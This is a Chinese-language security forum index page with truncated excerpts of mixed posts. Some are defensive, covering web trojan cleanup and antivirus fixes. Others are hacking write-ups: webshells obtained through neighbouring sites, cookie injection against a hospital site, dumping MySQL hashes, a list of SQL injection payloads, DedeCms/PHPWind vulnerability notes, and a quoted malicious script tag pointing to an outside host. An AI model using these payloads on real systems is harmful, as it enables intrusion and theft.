电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

解决办法： １、用青云团队开发的网站木马清理专家全面扫描服务器上的网站，网站木马清理专家下载地址：https://www.jb51.net/softs/12771.html２、如果这时木马还是存在，用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码，如下图所示： ３、关闭服务器上的缩略图功能 方法参考 https://www.jb51.net ...

网站木马清理专家全功能免费版：https://www.jb51.net/softs/12771.html挂马内容如下： 程序代码 document.writeln("<script src=http:\/\/52yes.9966.org:10086\/images\/1.gif?KRKJ><\/script>"); 替换规则如下： 程序代码 @document\.writeln\("<script.*9966\.org.*\/script>"\)； 挂马内容如下： 程序代码 <script src ...

一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。 要想让运行命令可以试试这种方法，成功率为五五之数。 把下面代码复制： 复制代码代码如下: <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat ...

目标站点是老Y文章管理系统v2.5的。在网上找了下，目前基本上没有什么可直接利用的漏洞，于是开始旁注上http://ip.468w.cn/ 查了下。服务器上150个站，用super injection导入全部站点后批量扫描注入点，很快拿到了服务器一个asp的shell,可是权限很低.几分钟过后又拿到同服另外的一个.net站的shell，初步看了下，星外的虚拟 ...

软件环境：McAfee VirusScan Enterprise 8.0iMcAfee Common Management Agent 3.x.xMcAfee VirusScan Enterprise 7.1Microsoft Windows问题1:a.启动自动更新时，提示80040154 @ 1错误，显示：Failed to initialize Common Updater Subsystemb.提示：Make sure the McAfee Framework Service is running（请确认McAfee Frame ...

确认有足够的权限启动系统服务。” 按“忽略（I）”才能继续安装，但最后还是不能升级。经过不断摸索，上官方网站查询资料，找到解决办法如下： 打开服务控制台，禁用 McAfee Framework 服务 重新启动，启动后在进程中(打开任务管理器) 结束 UpdaterUI.exe 运行regedit ,删除以下： HKEY_LOCAL_MACHINE\SYST ...

McAfee更新失败，提示"初始化Common Updater子系统失败"的解决方法作为一名忠实的麦粉，多年来我一直使用McAfee这款杀毒软件。但最近一周开始McAfee出现无法更新的状况，自动更新和手动更新都失败，弹出错误提示窗口的信息为“初始化Common Updater子系统失败.确保McAfee Framework service正在运行.McAfee Framework ...

作者:Tommie(C.R.S.T)已经发表在黑客手册2008年第三期.or突破防注入    春节呆在家里上网，我表哥突然找我说要一个DJ网站的VIP会员，说搞定后请我吃KFC，于是就答应了。用IE打开目标网站，找到一个带参数的ASP链接。提交AND 1=1，如图2。可能到了这里，有些读者会选择放弃。其实，如果一个网站的防注入不是 ...

提权时，当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时： 停止mysql服务 将下载的user.MYD user.frm   user.MYI替换本地文件，然后 cd mysql\binmysqld-nt --skip-grant-tables 重新打开一个cmdmysql -u root select user,password from mysql.user; 自己记录下，免得忘记命令 ...

与其他编程语言一样，PowerShell 脚本容易受到注入攻击。 当用户向包含额外命令的易受攻击的函数提供输入时，会发生注入攻击。 易受攻击的函数运行额外的命令，这可能是严重的安全漏洞。 例如，恶意用户可能会滥用易受攻击的函数在远程计算机上运行任意代码，从而损害该计算机并获取对网络上其他计算机的访问权限。 了解问 ...

打开网站(网址就不发了，只讲过程)，是一个医院的站点，看了下网站程序，是asp的，嘻嘻，asp的站日的比较多，对它有点亲切感，随便点了一个新闻链接，加上一个单引号，弹出了一个对话框 看来有点防范啊，为了确定是否是防注入系统，如果是的话，我们就可以试试cookie注入了，于是，我换个方法检测了下，就是http://www.xxx. ...

第一步：在系统的右下角有个图标，右键选择 VirssScan 控制台，如下图所示：第二步：工具>解锁用户界面第三步：登录名，输入密码第四步：安装软件时，或解除修改文件限制的时候，需要停止才可以了。修改后，立即开始，防止被黑客利用。保护文件安全。第五步：大家可以工具 锁定用户界面。琼殿技术社区服务器安全设置的用户 ...

　　PHPWIND 论坛是一款流行的PHP 论坛，界面美观，功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格，它和 DISCUZ 都非常相似，具体原因我想也就不用说了，毕竟 DISCUZ 出来比它要早很多。但安全上它没有继承 DISCUZ 的优点， DISCUZ 论坛安全性非常好，而且商家也对此非常重视安全问题，国内论坛中不 ...

　　涉及版本： 　　目前(2003/9/21)所有免费版本(我没有商业版) 　　描述： 　　由于pm.php发送消息那部分代码，缺乏对时间间隔的限制。导致任何用户可以对任何用户发送消息炸弹。导致服务器空间、资源被消耗。严重可导致拒绝服务。 　　具体： 　　大家可以看到pm.php文件的86行的代码： 　　86 } elseif($action == &rsq ...

　　php注射库 　　' or 1=1 　　' or '1=1 　　'/* 　　'%23 　　' and password='mypass 　　id=-1 union select 1,1,1 　　id=-1 union select char(97),char(97),char(97) 　　id=1 union select 1,1,1 from members 　　id=1 union select 1,1,1 from admin 　　id=1 union select 1,1,1 from user 　　userid=1 and p ...

SEBUG-ID:3885 SEBUG-Appdir:织梦(DedeCms) 发布时间:2008-08-20 影响版本: DedeCms V5.1 [sp1]漏洞描述: Dedecms算是使用比较广泛的PHP整站系统了，在被使用的同时系统的安全性也被人们关注 目录下的tag.php文件对变量$tag处理不当，导致注入漏洞的形成 因为可以使用“'”,所以如果条件可以的话可以直接into fil ...

　　信息安全行业的一位首席Web安全专家称，一年多前发现的哈希算法漏洞可能成为Web上最危险的安全漏洞。 　　在2010 RSA大会上，WhiteHat首席安全技术官Jeremiah Grossman正式提出去年中排名前十位的网络黑客攻击技术。一月份，Grossman首次在其博客上列出这一第四年度列表，他试图阐明那些往往不会引起人注意但有重大意义 ...

　　微软已经为.Net环境添加了大量的功能，帮助开发人员创建安全的应用程序，例如，身份验证已经成为开发环境集成的一个功能，另外，默认情况下调试消息被禁用掉了。微软对安全的关注程度极大地影响了开发人员，促使他们在软件开发过程中重新评估纳入安全保障的重要性。 　　但遗憾的是不是每个人都能做得很好，据来自SPI D ...

　　猫猫传给我一个phpwind2.0.1漏洞利用程序，可以直接在目录中写入一个木马。怎么说呢，这个漏洞是pinkeyes发现的，本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的，我还在冒虚汗中，同时pinkeyes 的睿智深深的打动了我，原来我才明白什么才是真正的技术含量。且听我慢慢道来： 　　在程序运行时，我抓了一个 ...

　　影响版本: 　　DedeCms V5漏洞描述: 　　DedeCms由2004年到现在，已经经历了五个版本，从DedeCms V2 开始，DedeCms开发了自己的模板引擎，使用XML名字空间风格的模板，对美工制作的直观性提供了极大的便利，从V2.1开始，DedeCms人气急却上升，成为国内最流行的CMS软件，在DedeCms V3版本中，开始引入了模型的概念，从而 ...